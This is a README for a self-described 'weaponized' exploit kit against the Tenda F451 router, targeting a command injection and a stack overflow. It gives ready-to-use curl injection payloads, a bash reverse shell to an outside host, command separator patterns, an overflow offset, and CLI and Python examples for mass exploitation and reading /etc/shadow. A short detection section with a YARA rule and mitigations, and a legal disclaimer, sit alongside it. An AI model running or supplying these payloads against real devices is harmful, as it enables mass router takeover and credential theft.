# Tenda F451 Multi-CVE Exploit Kit (Upgraded) **CVE-2026-11556 (WriteFacMac) | CVE-2026-11557 (Stack Overflow Chain)** **Military-Grade Multi-Vector RCE Framework for Tenda F451 Router** ![Severity](https://img.shields.io/badge/Severity-Critical-red) ![CVSS](https://img.shields.io/badge/CVSS-9.8-red) ![Status](https://img.shields.io/badge/Status-Weaponized-red) --- ## Overview The Tenda F451 router contains two critical pre-authentication vulnerabilities that can be chained for reliable remote code execution: | CVE | Endpoint | Parameter | Type | Method | |-----|----------|-----------|------|--------| | **CVE-2026-11556** | `/goform/WriteFacMac` | `mac` | OS Command Injection | POST | | **CVE-2026-11557** | `/goform/fast_setting_wifi_set` | `wifi_ssid` | Stack Buffer Overflow Chain | POST | ### Exploitation Chain ``` [CVE-2026-11556] Command Injection (reliable, immediate RCE) OR [CVE-2026-11557] Stack Overflow → Memory Corruption → Code Execution ``` Both endpoints accept HTTP POST requests and process input without authentication or CSRF protection. --- ## Technical Details ### CVE-2026-11556: WriteFacMac Command Injection The `WriteFacMac` handler processes MAC address filtering requests. The `mac` parameter is directly interpolated into a shell command without sanitization. **Vulnerable Code Pattern:** ```c // /bin/httpd - WriteFacMac handler int WriteFacMac(webs_t wp) { char mac[64]; char *input = websGetVar(wp, "mac", ""); char cmd[128]; sprintf(cmd, "iwpriv ra0 set AccessControlList=%s", input); // INJECTION system(cmd); } ``` **Exploitation:** ```bash # Direct command execution curl -X POST http://target/goform/WriteFacMac \ -d "mac=aa:bb:cc:dd:ee:ff;id" # Output: uid=0(root) gid=0(root) groups=0(root) # Reverse shell curl -X POST http://target/goform/WriteFacMac \ -d "mac=aa:bb:cc:dd:ee:ff;bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'" ``` ### CVE-2026-11557: Stack Overflow Chain The `fast_setting_wifi_set` handler processes WiFi SSID configuration. The `wifi_ssid` parameter is copied into a fixed-size stack buffer without length bounds checking, leading to a stack-based buffer overflow. **Vulnerable Code Pattern:** ```c // /bin/httpd - fast_setting_wifi_set handler int fast_setting_wifi_set(webs_t wp) { char ssid[256]; char *input = websGetVar(wp, "wifi_ssid", ""); strcpy(ssid, input); // NO BOUNDS CHECK - OVERFLOW // Stack layout: ssid[256] + padding + saved $fp + saved $ra } ``` **Stack Layout:** ``` [ ssid buffer: 256 bytes ] [ padding: ~768 bytes ] [ saved $fp ] [ saved $ra ] <-- overwrite here ^^^^^^^^^^^^ offset: ~1024 bytes ``` --- ## Exploitation Vectors ### Vector 1: Command Injection (Most Reliable) Multiple injection patterns supported for maximum reliability: | Pattern | Example | Use Case | |---------|---------|----------| | Semicolon | `mac;id` | Basic command separator | | Double AND | `mac&&id` | Chain commands | | Pipe | `mac\|id` | Pipe output | | Backticks | `mac\`id\`` | Command substitution | | `$()` | `mac$(id)` | Modern command substitution | ### Vector 2: Stack Overflow Chain For architectures with limited command injection reliability, the stack overflow provides a second exploitation path: 1. **Overflow saved return address** at offset ~1024 bytes 2. **Redirect execution** to ROP chain or shellcode 3. **Achieve code execution** with controlled registers **Framework includes:** - Payload builder with configurable offset - HTTP form encoding for binary payloads - Custom payload file support --- ## Repository Structure ``` tenda_f451_upgraded/ ├── requirements.txt # Python dependencies ├── scanner.py # Async scanner with injection detection ├── exploit.py # Multi-CVE exploitation framework └── README.md # This file ``` --- ## Quick Start ### 1. Install Dependencies ```bash python3.11 -m venv .venv source .venv/bin/activate pip install --upgrade pip pip install -r requirements.txt ``` ### 2. Reconnaissance Scan ```bash # CIDR sweep with command injection detection python scanner.py -n 192.168.1.0/24 -o scan_results.json # Single target python scanner.py -t 192.168.1.50 # Target list python scanner.py -f targets.txt --threads 200 # Sample output: # Target: 192.168.1.50 # Status: VULNERABLE (confidence: 88%) # >>> CVE-2026-11556 CONFIRMED # → http/80: Tenda F451 Web UI # → CVE-2026-11556: Command injection confirmed with payloads: ['test;id'] ``` ### 3. Exploitation ```bash # Immediate command injection (most reliable) python exploit.py -t 192.168.1.50 -c "id; cat /etc/passwd; cat /etc/shadow" --cve 11556 # Reverse shell via command injection python exploit.py -t 192.168.1.50 --reverse --lhost 10.0.0.5 --lport 4444 --cve 11556 # Stack overflow chain python exploit.py -t 192.168.1.50 --cve 11557 --offset 1024 # Mass exploitation python exploit.py -f targets.txt --reverse --lhost 10.0.0.5 -o exploit_results.json -w 50 # Custom payload file python exploit.py -t 192.168.1.50 --cve 11557 --payload-file custom_shellcode.bin ``` --- ## Exploit Module API ### Direct Function Calls ```python from exploit import ( exploit_cve2026_11556, exploit_cve2026_11556_reverse_shell, exploit_cve2026_11557, run_exploit_chain, mass_exploit, ) # CVE-2026-11556: Command injection ok, output = exploit_cve2026_11556("192.168.1.50", command="id") ok, output = exploit_cve2026_11556_reverse_shell("192.168.1.50", "10.0.0.5", 4444) # CVE-2026-11557: Stack overflow ok, output = exploit_cve2026_11557("192.168.1.50", command="id") ok, output = exploit_cve2026_11557("192.168.1.50", offset=1024, payload_file="shellcode.bin") # Orchestrated chain sessions = run_exploit_chain("192.168.1.50", cve="all", reverse_shell=True, lhost="10.0.0.5", lport=4444, mac="aa:bb:cc:dd:ee:ff") # Parallel mass exploitation results = mass_exploit(["192.168.1.50", "192.168.1.51"], reverse_shell=True, lhost="10.0.0.5", lport=4444) ``` --- ## Detection & Mitigation ### Network Indicators | Indicator | Description | |-----------|-------------| | HTTP POST `/goform/WriteFacMac` with `mac` parameter containing `;`, `&&`, `\|` | Command injection attempt | | HTTP POST `/goform/fast_setting_wifi_set` with `wifi_ssid` > 256 bytes | Overflow attempt | | Large POST bodies | Potential exploit payloads | ### YARA Rule ```yara rule Tenda_F451_MultiCVE { strings: $endpoint1 = "/goform/WriteFacMac" nocase $endpoint2 = "/goform/fast_setting_wifi_set" nocase $param1 = "mac=" nocase $param2 = "wifi_ssid=" nocase $injection_chars = ";|&`$" nocase condition: ($endpoint1 and $param1) or ($endpoint2 and $param2) } ``` ### Mitigations 1. **Immediate**: Disable remote management (WAN access) 2. **Firmware**: Update to latest Tenda release 3. **Network WAF**: Block POST to `/goform/*` from external IPs 4. **IDS/IPS**: Deploy signatures for shell metacharacters in form data 5. **Monitoring**: Alert on `system()` or `popen()` calls from httpd process --- ## Weaponization Features | Feature | Implementation | |---------|----------------| | **Multi-Vector** | Command injection (reliable) + Stack overflow (precision) | | **Injection Patterns** | 6 payload formats for maximum reliability | | **Custom Payloads** | Load from file for advanced exploitation | | **Offset Configurable** | Support variable overflow offsets | | **Parallel Mass Exploit** | ThreadPoolExecutor with configurable workers | | **Session Tracking** | Full metadata on every exploitation attempt | --- ## Legal & Ethics This toolkit is provided for: - Authorized penetration testing of infrastructure you own - CISA/NCC/NCSC-aligned defensive research - Detection rule development and purple-team exercises - Red team / bug bounty programmes with explicit written scope **Unauthorized use against systems you do not own is a criminal offence** under CFAA (US), Computer Misuse Act (UK), GDPR Art. 32 (EU), and equivalent legislation worldwide. --- ## References | CVE | Description | |-----|-------------| | CVE-2026-11556 | Tenda F451 WriteFacMac OS Command Injection | | CVE-2026-11557 | Tenda F451 fast_setting_wifi_set Stack Buffer Overflow | --- ## Version History | Version | Date | Changes | |---------|------|---------| | 2.0.0 | 2026-06-13 | Complete rewrite: async scanner with injection detection, multi-vector orchestration | | 1.0.0 | 2026-06-10 | Initial release (basic PoC scripts) | --- ## Author Advanced Persistent Security Research Military-grade exploit engineering for authorized assessment only.